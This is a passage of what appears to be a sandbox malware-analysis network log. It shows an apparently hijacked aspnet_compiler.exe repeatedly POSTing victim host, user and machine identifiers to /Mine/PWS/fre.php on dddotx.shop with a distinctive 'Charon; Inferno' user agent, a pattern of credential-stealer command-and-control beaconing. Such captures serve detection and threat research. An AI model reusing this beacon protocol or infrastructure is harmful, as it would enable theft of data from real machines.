Sep 25, 2024 10:19:16.376988888 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:17.021929979 CEST	561	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S8QNSisiSVEqhsk6TCyoGssnRvviWJUo9jzDFmiQm4VI28HHBgYV0vYYMShDkhYNJJVb6E8f6yZOg2qgKRjkF17BC5dCBiIQ36FRa2FZRqcgpVmssGNk2A9KKQ1CXQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89969dd9e4431a-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49709	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:17.173356056 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:17.178646088 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:18.146569014 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BOSV1q19agfRAcyOSr3G8U%2BwoyB8cgCXCChrISMMVo845%2Bag6s6tNHAVP8k6Gph9wJf1Ppc8pabXj2SFCiU9xvpcUzlsPNNIqAmtaFjUlml08%2FR%2BZttYl%2BNhDascQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996a2deb043dd-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Sep 25, 2024 10:19:18.146904945 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BOSV1q19agfRAcyOSr3G8U%2BwoyB8cgCXCChrISMMVo845%2Bag6s6tNHAVP8k6Gph9wJf1Ppc8pabXj2SFCiU9xvpcUzlsPNNIqAmtaFjUlml08%2FR%2BZttYl%2BNhDascQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996a2deb043dd-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49710	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:18.291294098 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:18.296156883 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:18.987284899 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=03BLncS52vpJEz1WmD%2BLPQ9t97y29aDADLRNppBZesIOedKbpGF3mpYFoickwpiFSIGSpiVgIKiYvX5FpkwIpoiyclDx5RgO0VKa2UncvkFbJ1ECLtf1AES7wT0qiw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996a9eeba4319-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49711	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:19.149311066 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:19.154273987 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:19.794781923 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iuyt4sVbpw5v7D8MRS4CpKTyIh9kMv8R8bEhoqf9Sc7SaHYxg1XWLFkdDk7HxcvGV%2BtLLZQTgr2RbCLHi3QlChNz0IQEAP91q0VwW0fht4kRnYyFfvMEhiKchpY1pw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996af2d5c7292-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49712	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:20.131067038 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:20.137434959 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:20.898915052 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=przmNtHt17QidHH1WoXo5RRVUv7HWNlmaIYCtvS%2BbUHR8XjEGwfebNnwepPJjMoPToSTfe7PbIPPharL1ajJnVZ2glsmcXP%2BHN1c3YTGb83cUhdGnXFrrt9wF5tNMw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996b528d58cdc-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49713	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:21.048491955 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:21.053477049 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:21.689222097 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5QgCVXj7RNA514KYbr%2BwUa%2BoK0SASz7gyoS3HxtTGjWWUrzgSq5IhiXSYvFZQZqA4Bhuhxo7WhImHscO4kj2WQ3jOvG0FSvEV%2BK5eh2X0rapu%2FzsBpyN7w8nm%2F%2FsMA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996bb0c387d06-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49714	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:21.837608099 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:21.842648029 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:22.552182913 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0AAybTIgOuUxx7QPzV%2B87h6QxSjxBTdSBgErwND8sNgMOvLLNA4ZTjKWQy1MVfWsy9SM95W6FgE9w%2FMdUuhGznlpnmHFazXQ661H1SLTOjTY5EaCl2vHPsMjajw%2FmA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996c00f91c334-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49715	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:22.850320101 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:22.855191946 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:23.518683910 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=maqvNCmgSwqA2O7i62KLiBuc7DqBxStg5Y%2Ffan4JJxh9IsWq%2Fm%2B6kDO3bvlCjthk60vmL31PeK%2FeZQBpO9GHbGg42%2BWoRcNv1W4Zvh6fTAjL%2Fcuo8LwKeBgvcmj6rA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996c6591a8c5f-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49718	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:23.672030926 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:23.676953077 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:24.365703106 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m1JoKrr7RhHAcpEe2cIYu5MWlyXZ6HS1JJtDy5m%2Fsrf%2B2aA1k0%2Bo0XoarJsZAKkRge0XXh62ZwPrbp1qINoihMUOlaNg4LF6PsYEaJe7cDIRipgD11gcv%2BHLmiG0jg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996cb6f104401-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49720	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:24.565601110 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:24.570672035 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:25.286429882 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TZ2uo4MS5haEFosad9DwHaAfIJP%2B9jPM1Cj4YkThGFemLImngDuXKlgfVe4vRiD5kTvw1PAOt6JHEDvWsvKDwqAqI35yC%2FembVxVhudmg1e6euqs0XPk13ES4XugDQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996d10e290ca2-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49723	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:25.434835911 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:25.439699888 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:25.750916958 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:27.092124939 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Xkta2U3QnLTgQhBitM61NxDRFKQNUwbsyMpWsX7tdzdkGpuo8YbGk2KkWGJtMBUPUrB1FjXVKY7DE%2BuMG8wnQhhvwpVVW0wbT3XTOWQBO4xVOo4uOImjw6jhR%2BruQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996d67c038c60-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49724	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:27.264889956 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:27.269752026 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:28.045062065 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lRkENZEDwOcPzD62L4S7Gg4KDUpucGpdy4xNGyJoqEPX%2FOdANorPqjHQv5z4JgNB0Nzz7s3Pmey1HJ8oWwLrJuk7gdwZmFVKcxnlYJCpI5CkSAU9ksvvGv2hlyozXA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996e1d83b424a-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49725	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:28.201822996 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:28.206792116 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:28.881432056 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fvbXnmF9JsaSZMr0T%2B8mojQtqU91k2MfExJUFwLNUqGGeMJBYJemVH0qK6bjvGtA6kfOp3kfE%2B7Ykwn6uz5lRISD5aHZkf5bK9DGrOdBqDTzSyUw5nTBWn%2B2KRCsTQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996e7ba494349-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49726	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:29.032421112 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:29.037708998 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:29.680705070 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ph4jvZ6wd3aVkAH%2BqVmYUVFZZxodfJmAaTv72TJBljn8HDSRVgnNsuQObOsBys7CzVCAc4cjnoVTUISIatbNYSouD%2F0MLK4NMGWcRKdvFBNSHDbg65y7auLOSKiLUA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996ecfe6b1871-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49727	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:29.841895103 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:29.847887993 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
